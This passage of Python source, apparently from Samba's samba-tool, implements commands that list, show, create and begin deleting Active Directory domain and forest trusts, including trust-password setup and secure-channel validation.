lsa.LSA_TRUST_TYPE_DCE: "DCE",
}
return self.generic_enum_to_string(types, v)
def trustDirection_string(self, v):
directions = {
lsa.LSA_TRUST_DIRECTION_INBOUND |
lsa.LSA_TRUST_DIRECTION_OUTBOUND: "BOTH",
lsa.LSA_TRUST_DIRECTION_INBOUND: "INBOUND",
lsa.LSA_TRUST_DIRECTION_OUTBOUND: "OUTBOUND",
}
return self.generic_enum_to_string(directions, v)
def trustAttributes_string(self, v):
attributes = {
lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE: "NON_TRANSITIVE",
lsa.LSA_TRUST_ATTRIBUTE_UPLEVEL_ONLY: "UPLEVEL_ONLY",
lsa.LSA_TRUST_ATTRIBUTE_QUARANTINED_DOMAIN: "QUARANTINED_DOMAIN",
lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE: "FOREST_TRANSITIVE",
lsa.LSA_TRUST_ATTRIBUTE_CROSS_ORGANIZATION: "CROSS_ORGANIZATION",
lsa.LSA_TRUST_ATTRIBUTE_WITHIN_FOREST: "WITHIN_FOREST",
lsa.LSA_TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL: "TREAT_AS_EXTERNAL",
lsa.LSA_TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION: "USES_RC4_ENCRYPTION",
}
return self.generic_bitmap_to_string(attributes, v)
def kerb_EncTypes_string(self, v):
enctypes = {
security.KERB_ENCTYPE_DES_CBC_CRC: "DES_CBC_CRC",
security.KERB_ENCTYPE_DES_CBC_MD5: "DES_CBC_MD5",
security.KERB_ENCTYPE_RC4_HMAC_MD5: "RC4_HMAC_MD5",
security.KERB_ENCTYPE_AES128_CTS_HMAC_SHA1_96: "AES128_CTS_HMAC_SHA1_96",
security.KERB_ENCTYPE_AES256_CTS_HMAC_SHA1_96: "AES256_CTS_HMAC_SHA1_96",
security.KERB_ENCTYPE_FAST_SUPPORTED: "FAST_SUPPORTED",
security.KERB_ENCTYPE_COMPOUND_IDENTITY_SUPPORTED: "COMPOUND_IDENTITY_SUPPORTED",
security.KERB_ENCTYPE_CLAIMS_SUPPORTED: "CLAIMS_SUPPORTED",
security.KERB_ENCTYPE_RESOURCE_SID_COMPRESSION_DISABLED: "RESOURCE_SID_COMPRESSION_DISABLED",
}
return self.generic_bitmap_to_string(enctypes, v)
def entry_tln_status(self, e_flags):
if e_flags == 0:
return "Status[Enabled]"
flags = {
lsa.LSA_TLN_DISABLED_NEW: "Disabled-New",
lsa.LSA_TLN_DISABLED_ADMIN: "Disabled",
lsa.LSA_TLN_DISABLED_CONFLICT: "Disabled-Conflicting",
}
return "Status[%s]" % self.generic_bitmap_to_string(flags, e_flags, names_only=True)
def entry_dom_status(self, e_flags):
if e_flags == 0:
return "Status[Enabled]"
flags = {
lsa.LSA_SID_DISABLED_ADMIN: "Disabled-SID",
lsa.LSA_SID_DISABLED_CONFLICT: "Disabled-SID-Conflicting",
lsa.LSA_NB_DISABLED_ADMIN: "Disabled-NB",
lsa.LSA_NB_DISABLED_CONFLICT: "Disabled-NB-Conflicting",
}
return "Status[%s]" % self.generic_bitmap_to_string(flags, e_flags, names_only=True)
def write_forest_trust_info(self, fti, tln=None, collisions=None):
if tln is not None:
tln_string = " TDO[%s]" % tln
else:
tln_string = ""
self.outf.write("Namespaces[%d]%s:\n" % (
len(fti.entries), tln_string))
for i, e in enumerate(fti.entries):
flags = e.flags
collision_string = ""
if collisions is not None:
for c in collisions.entries:
if c.index != i:
continue
flags = c.flags
collision_string = " Collision[%s]" % (c.name.string)
d = e.forest_trust_data
if e.type == lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
self.outf.write("TLN: %-32s DNS[*.%s]%s\n" % (
self.entry_tln_status(flags),
d.string, collision_string))
elif e.type == lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX:
self.outf.write("TLN_EX: %-29s DNS[*.%s]\n" % (
"", d.string))
elif e.type == lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
self.outf.write("DOM: %-32s DNS[%s] Netbios[%s] SID[%s]%s\n" % (
self.entry_dom_status(flags),
d.dns_domain_name.string,
d.netbios_domain_name.string,
d.domain_sid, collision_string))
return
class cmd_domain_trust_list(DomainTrustCommand):
"""List domain trusts."""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
]
def run(self, sambaopts=None, versionopts=None, localdcopts=None):
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_trusts = \
local_netlogon.netr_DsrEnumerateDomainTrusts(local_server,
netlogon.NETR_TRUST_FLAG_IN_FOREST |
netlogon.NETR_TRUST_FLAG_OUTBOUND |
netlogon.NETR_TRUST_FLAG_INBOUND)
except RuntimeError as error:
if self.check_runtime_error(error, werror.WERR_RPC_S_PROCNUM_OUT_OF_RANGE):
# TODO: we could implement a fallback to lsa.EnumTrustDom()
raise CommandError("LOCAL_DC[%s]: netr_DsrEnumerateDomainTrusts not supported." % (
self.local_server))
raise self.LocalRuntimeError(self, error, "netr_DsrEnumerateDomainTrusts failed")
a = local_netlogon_trusts.array
for t in a:
if t.trust_flags & netlogon.NETR_TRUST_FLAG_PRIMARY:
continue
self.outf.write("%-14s %-15s %-19s %s\n" % (
"Type[%s]" % self.netr_DomainTrust_to_type(a, t),
"Transitive[%s]" % self.netr_DomainTrust_to_transitive(t),
"Direction[%s]" % self.netr_DomainTrust_to_direction(t),
"Name[%s]" % self.netr_DomainTrust_to_name(t)))
return
class cmd_domain_trust_show(DomainTrustCommand):
"""Show trusted domain details."""
synopsis = "%prog NAME [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, versionopts=None, localdcopts=None):
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
lsaString = lsa.String()
lsaString.string = domain
try:
local_tdo_full = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
local_tdo_info = local_tdo_full.info_ex
local_tdo_posix = local_tdo_full.posix_offset
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("trusted domain object does not exist for domain [%s]" % domain)
raise self.LocalRuntimeError(self, error, "QueryTrustedDomainInfoByName(FULL_INFO) failed")
try:
local_tdo_enctypes = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES)
except NTSTATUSError as error:
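# Servers that do not support this info class return INVALID_PARAMETER or
# INVALID_INFO_CLASS; treat both as "no supported encryption types recorded".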
if self.check_runtime_error(error, ntstatus.NT_STATUS_INVALID_PARAMETER):
error = None
if self.check_runtime_error(error, ntstatus.NT_STATUS_INVALID_INFO_CLASS):
error = None
if error is not None:
raise self.LocalRuntimeError(self, error,
"QueryTrustedDomainInfoByName(SUPPORTED_ENCRYPTION_TYPES) failed")
local_tdo_enctypes = lsa.TrustDomainInfoSupportedEncTypes()
local_tdo_enctypes.enc_types = 0
try:
local_tdo_forest = None
if local_tdo_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
local_tdo_forest = \
local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_RPC_PROCNUM_OUT_OF_RANGE):
error = None
if self.check_runtime_error(error, ntstatus.NT_STATUS_NOT_FOUND):
error = None
if error is not None:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation failed")
local_tdo_forest = lsa.ForestTrustInformation()
local_tdo_forest.count = 0
local_tdo_forest.entries = []
self.outf.write("TrustedDomain:\n\n")
self.outf.write("NetbiosName: %s\n" % local_tdo_info.netbios_name.string)
if local_tdo_info.netbios_name.string != local_tdo_info.domain_name.string:
self.outf.write("DnsName: %s\n" % local_tdo_info.domain_name.string)
self.outf.write("SID: %s\n" % local_tdo_info.sid)
self.outf.write("Type: %s\n" % self.trustType_string(local_tdo_info.trust_type))
self.outf.write("Direction: %s\n" % self.trustDirection_string(local_tdo_info.trust_direction))
self.outf.write("Attributes: %s\n" % self.trustAttributes_string(local_tdo_info.trust_attributes))
posix_offset_u32 = ctypes.c_uint32(local_tdo_posix.posix_offset).value
posix_offset_i32 = ctypes.c_int32(local_tdo_posix.posix_offset).value
self.outf.write("PosixOffset: 0x%08X (%d)\n" % (posix_offset_u32, posix_offset_i32))
self.outf.write("kerb_EncTypes: %s\n" % self.kerb_EncTypes_string(local_tdo_enctypes.enc_types))
if local_tdo_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
self.write_forest_trust_info(local_tdo_forest,
tln=local_tdo_info.domain_name.string)
return
class cmd_domain_trust_create(DomainTrustCommand):
"""Create a domain or forest trust."""
synopsis = "%prog DOMAIN [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--type", type="choice", metavar="TYPE",
choices=["external", "forest"],
help="The type of the trust: 'external' or 'forest'.",
dest='trust_type',
default="external"),
Option("--direction", type="choice", metavar="DIRECTION",
choices=["incoming", "outgoing", "both"],
help="The trust direction: 'incoming', 'outgoing' or 'both'.",
dest='trust_direction',
default="both"),
Option("--create-location", type="choice", metavar="LOCATION",
choices=["local", "both"],
help="Where to create the trusted domain object: 'local' or 'both'.",
dest='create_location',
default="both"),
Option("--cross-organisation", action="store_true",
help="The related domains does not belong to the same organisation.",
dest='cross_organisation',
default=False),
Option("--quarantined", type="choice", metavar="yes|no",
choices=["yes", "no", None],
help="Special SID filtering rules are applied to the trust. "
"With --type=external the default is yes. "
"With --type=forest the default is no.",
dest='quarantined_arg',
default=None),
Option("--not-transitive", action="store_true",
help="The forest trust is not transitive.",
dest='not_transitive',
default=False),
Option("--treat-as-external", action="store_true",
help="The treat the forest trust as external.",
dest='treat_as_external',
default=False),
Option("--no-aes-keys", action="store_false",
help="The trust uses aes kerberos keys.",
dest='use_aes_keys',
default=True),
Option("--skip-validation", action="store_false",
help="Skip validation of the trust.",
dest='validate',
default=True),
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, localdcopts=None, credopts=None, versionopts=None,
trust_type=None, trust_direction=None, create_location=None,
cross_organisation=False, quarantined_arg=None,
not_transitive=False, treat_as_external=False,
use_aes_keys=True, validate=True):
lsaString = lsa.String()
quarantined = False
if quarantined_arg is None:
if trust_type == 'external':
quarantined = True
elif quarantined_arg == 'yes':
quarantined = True
if trust_type != 'forest':
if not_transitive:
raise CommandError("--not-transitive requires --type=forest")
if treat_as_external:
raise CommandError("--treat-as-external requires --type=forest")
enc_types = None
if use_aes_keys:
enc_types = lsa.TrustDomainInfoSupportedEncTypes()
enc_types.enc_types = security.KERB_ENCTYPE_AES128_CTS_HMAC_SHA1_96
enc_types.enc_types |= security.KERB_ENCTYPE_AES256_CTS_HMAC_SHA1_96
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
local_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
local_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
local_trust_info = lsa.TrustDomainInfoInfoEx()
local_trust_info.trust_type = lsa.LSA_TRUST_TYPE_UPLEVEL
local_trust_info.trust_direction = 0
if trust_direction == "both":
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
elif trust_direction == "incoming":
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
elif trust_direction == "outgoing":
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
local_trust_info.trust_attributes = 0
if cross_organisation:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_CROSS_ORGANIZATION
if quarantined:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
if trust_type == "forest":
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE
if not_transitive:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE
if treat_as_external:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL
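# Prompt for a trust password twice and loop until both entries match and are non-empty.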
def get_password(name):
password = None
while True:
if password is not None and password != '':
return password
password = getpass("New %s Password: " % name)
passwordverify = getpass("Retype %s Password: " % name)
if password != passwordverify:
password = None
self.outf.write("Sorry, passwords do not match.\n")
incoming_secret = None
outgoing_secret = None
remote_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
if create_location == "local":
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_INBOUND:
incoming_password = get_password("Incoming Trust")
incoming_secret = string_to_byte_array(incoming_password.encode('utf-16-le'))
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
outgoing_password = get_password("Outgoing Trust")
outgoing_secret = string_to_byte_array(outgoing_password.encode('utf-16-le'))
remote_trust_info = None
else:
# We use 240 random bytes.
# Windows uses 28 or 240 random bytes. I guess it's
# based on the trust type external vs. forest.
#
# The initial trust password can be up to 512 bytes
# while the versioned passwords used for periodic updates
# can only be up to 498 bytes, as netr_ServerPasswordSet2()
# needs to pass the NL_PASSWORD_VERSION structure within the
# 512 bytes and a 2 bytes confounder is required.
#
def random_trust_secret(length):
pw = samba.generate_random_machine_password(length // 2, length // 2)
return string_to_byte_array(pw.encode('utf-16-le'))
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_INBOUND:
incoming_secret = random_trust_secret(240)
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
outgoing_secret = random_trust_secret(240)
remote_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
remote_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
remote_trust_info = lsa.TrustDomainInfoInfoEx()
remote_trust_info.trust_type = lsa.LSA_TRUST_TYPE_UPLEVEL
remote_trust_info.trust_direction = 0
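# The direction is mirrored on the remote side: a trust that is incoming
# for us is outgoing for the remote domain, and vice versa.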
if trust_direction == "both":
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
elif trust_direction == "incoming":
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
elif trust_direction == "outgoing":
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
remote_trust_info.trust_attributes = 0
if cross_organisation:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_CROSS_ORGANIZATION
if quarantined:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
if trust_type == "forest":
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE
if not_transitive:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE
if treat_as_external:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
try:
remote_server = self.setup_remote_server(credopts, domain)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
try:
remote_lsa = self.new_remote_lsa_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect lsa server")
try:
(remote_policy, remote_lsa_info) = self.get_lsa_info(remote_lsa, remote_policy_access)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("RemoteDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
remote_lsa_info.name.string,
remote_lsa_info.dns_domain.string,
remote_lsa_info.sid))
local_trust_info.domain_name.string = remote_lsa_info.dns_domain.string
local_trust_info.netbios_name.string = remote_lsa_info.name.string
local_trust_info.sid = remote_lsa_info.sid
if remote_trust_info:
remote_trust_info.domain_name.string = local_lsa_info.dns_domain.string
remote_trust_info.netbios_name.string = local_lsa_info.name.string
remote_trust_info.sid = local_lsa_info.sid
try:
lsaString.string = local_trust_info.domain_name.string
local_old_dns = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.LocalRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
try:
lsaString.string = local_trust_info.netbios_name.string
local_old_netbios = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.LocalRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
if remote_trust_info:
try:
lsaString.string = remote_trust_info.domain_name.string
remote_old_dns = \
remote_lsa.QueryTrustedDomainInfoByName(remote_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.RemoteRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
try:
lsaString.string = remote_trust_info.netbios_name.string
remote_old_netbios = \
remote_lsa.QueryTrustedDomainInfoByName(remote_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.RemoteRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_info = self.get_netlogon_dc_info(local_netlogon, local_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to get netlogon dc info")
if remote_trust_info:
try:
remote_netlogon = self.new_remote_netlogon_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect netlogon server")
try:
remote_netlogon_dc_unc = self.get_netlogon_dc_unc(remote_netlogon,
remote_server, domain)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to get netlogon dc info")
def generate_AuthInOutBlob(secret, update_time):
if secret is None:
blob = drsblobs.trustAuthInOutBlob()
blob.count = 0
return blob
clear = drsblobs.AuthInfoClear()
clear.size = len(secret)
clear.password = secret
info = drsblobs.AuthenticationInformation()
info.LastUpdateTime = samba.unix2nttime(update_time)
info.AuthType = lsa.TRUST_AUTH_TYPE_CLEAR
info.AuthInfo = clear
array = drsblobs.AuthenticationInformationArray()
array.count = 1
array.array = [info]
blob = drsblobs.trustAuthInOutBlob()
blob.count = 1
blob.current = array
return blob
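# Pack the incoming/outgoing auth blobs into a trustDomainPasswords structure
# with a random 512-byte confounder and RC4-encrypt the packed result with the
# LSA session key; CreateTrustedDomainEx2() below expects the secrets in this form.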
def generate_AuthInfoInternal(session_key, incoming=None, outgoing=None):
confounder = [0] * 512
for i in range(len(confounder)):
confounder[i] = random.randint(0, 255)
trustpass = drsblobs.trustDomainPasswords()
trustpass.confounder = confounder
trustpass.outgoing = outgoing
trustpass.incoming = incoming
trustpass_blob = ndr_pack(trustpass)
encrypted_trustpass = arcfour_encrypt(session_key, trustpass_blob)
auth_blob = lsa.DATA_BUF2()
auth_blob.size = len(encrypted_trustpass)
auth_blob.data = string_to_byte_array(encrypted_trustpass)
auth_info = lsa.TrustDomainInfoAuthInfoInternal()
auth_info.auth_blob = auth_blob
return auth_info
update_time = samba.current_unix_time()
incoming_blob = generate_AuthInOutBlob(incoming_secret, update_time)
outgoing_blob = generate_AuthInOutBlob(outgoing_secret, update_time)
local_tdo_handle = None
remote_tdo_handle = None
local_auth_info = generate_AuthInfoInternal(local_lsa.session_key,
incoming=incoming_blob,
outgoing=outgoing_blob)
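# The remote TDO describes the same trust from the other side, so the
# incoming and outgoing blobs swap roles there.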
if remote_trust_info:
remote_auth_info = generate_AuthInfoInternal(remote_lsa.session_key,
incoming=outgoing_blob,
outgoing=incoming_blob)
try:
if remote_trust_info:
self.outf.write("Creating remote TDO.\n")
current_request = {"location": "remote", "name": "CreateTrustedDomainEx2"}
remote_tdo_handle = \
remote_lsa.CreateTrustedDomainEx2(remote_policy,
remote_trust_info,
remote_auth_info,
lsa.LSA_TRUSTED_DOMAIN_ALL_ACCESS)
self.outf.write("Remote TDO created.\n")
if enc_types:
self.outf.write("Setting supported encryption types on remote TDO.\n")
current_request = {"location": "remote", "name": "SetInformationTrustedDomain"}
remote_lsa.SetInformationTrustedDomain(remote_tdo_handle,
lsa.LSA_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES,
enc_types)
self.outf.write("Creating local TDO.\n")
current_request = {"location": "local", "name": "CreateTrustedDomainEx2"}
local_tdo_handle = local_lsa.CreateTrustedDomainEx2(local_policy,
local_trust_info,
local_auth_info,
lsa.LSA_TRUSTED_DOMAIN_ALL_ACCESS)
self.outf.write("Local TDO created\n")
if enc_types:
self.outf.write("Setting supported encryption types on local TDO.\n")
current_request = {"location": "local", "name": "SetInformationTrustedDomain"}
local_lsa.SetInformationTrustedDomain(local_tdo_handle,
lsa.LSA_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES,
enc_types)
except RuntimeError as error:
self.outf.write("Error: %s failed %sly - cleaning up\n" % (
current_request['name'], current_request['location']))
if remote_tdo_handle:
self.outf.write("Deleting remote TDO.\n")
remote_lsa.DeleteObject(remote_tdo_handle)
remote_tdo_handle = None
if local_tdo_handle:
self.outf.write("Deleting local TDO.\n")
local_lsa.DeleteObject(local_tdo_handle)
local_tdo_handle = None
if current_request['location'] == "remote":
raise self.RemoteRuntimeError(self, error, "%s" % (
current_request['name']))
raise self.LocalRuntimeError(self, error, "%s" % (
current_request['name']))
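# Unless --skip-validation was given: exchange forest trust information
# (for forest trusts) and verify the secure channel in each configured direction.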
if validate:
if local_trust_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
self.outf.write("Setup local forest trust information...\n")
try:
# get all information about the remote trust
# this triggers netr_GetForestTrustInformation to the remote domain
# and lsaRSetForestTrustInformation() locally, but new top level
# names are disabled by default.
local_forest_info = \
local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
remote_lsa_info.dns_domain.string,
netlogon.DS_GFTI_UPDATE_TDO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
try:
# here we try to enable all top level names
local_forest_collision = \
local_lsa.lsaRSetForestTrustInformation(local_policy,
remote_lsa_info.dns_domain,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
local_forest_info,
0)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.write_forest_trust_info(local_forest_info,
tln=remote_lsa_info.dns_domain.string,
collisions=local_forest_collision)
if remote_trust_info:
self.outf.write("Setup remote forest trust information...\n")
try:
# get all information about the local trust (from the perspective of the remote domain)
# this triggers netr_GetForestTrustInformation to our domain.
# and lsaRSetForestTrustInformation() remotely, but new top level
# names are disabled by default.
remote_forest_info = \
remote_netlogon.netr_DsRGetForestTrustInformation(remote_netlogon_dc_unc,
local_lsa_info.dns_domain.string,
netlogon.DS_GFTI_UPDATE_TDO)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
try:
# here we try to enable all top level names
remote_forest_collision = \
remote_lsa.lsaRSetForestTrustInformation(remote_policy,
local_lsa_info.dns_domain,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
remote_forest_info,
0)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.write_forest_trust_info(remote_forest_info,
tln=local_lsa_info.dns_domain.string,
collisions=remote_forest_collision)
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
self.outf.write("Validating outgoing trust...\n")
try:
local_trust_verify = local_netlogon.netr_LogonControl2Ex(local_netlogon_info.dc_unc,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
remote_lsa_info.dns_domain.string)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
local_trust_status = self._uint32(local_trust_verify.pdc_connection_status[0])
local_conn_status = self._uint32(local_trust_verify.tc_connection_status[0])
if local_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
else:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
if local_trust_status != werror.WERR_SUCCESS or local_conn_status != werror.WERR_SUCCESS:
raise CommandError(local_validation)
else:
self.outf.write("OK: %s\n" % local_validation)
if remote_trust_info:
if remote_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
self.outf.write("Validating incoming trust...\n")
try:
remote_trust_verify = \
remote_netlogon.netr_LogonControl2Ex(remote_netlogon_dc_unc,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
local_lsa_info.dns_domain.string)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
remote_trust_status = self._uint32(remote_trust_verify.pdc_connection_status[0])
remote_conn_status = self._uint32(remote_trust_verify.tc_connection_status[0])
if remote_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
else:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
if remote_trust_status != werror.WERR_SUCCESS or remote_conn_status != werror.WERR_SUCCESS:
raise CommandError(remote_validation)
else:
self.outf.write("OK: %s\n" % remote_validation)
if remote_tdo_handle is not None:
try:
remote_lsa.Close(remote_tdo_handle)
except RuntimeError as error:
pass
remote_tdo_handle = None
if local_tdo_handle is not None:
try:
local_lsa.Close(local_tdo_handle)
except RuntimeError as error:
pass
local_tdo_handle = None
self.outf.write("Success.\n")
return
class cmd_domain_trust_delete(DomainTrustCommand):
"""Delete a domain trust."""
synopsis = "%prog DOMAIN [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--delete-location", type="choice", metavar="LOCATION",
choices=["local", "both"],
help="Where to delete the trusted domain object: 'local' or 'both'.",
dest='delete_location',
default="both"),
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, localdcopts=None, credopts=None, versionopts=None,
delete_location=None):
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
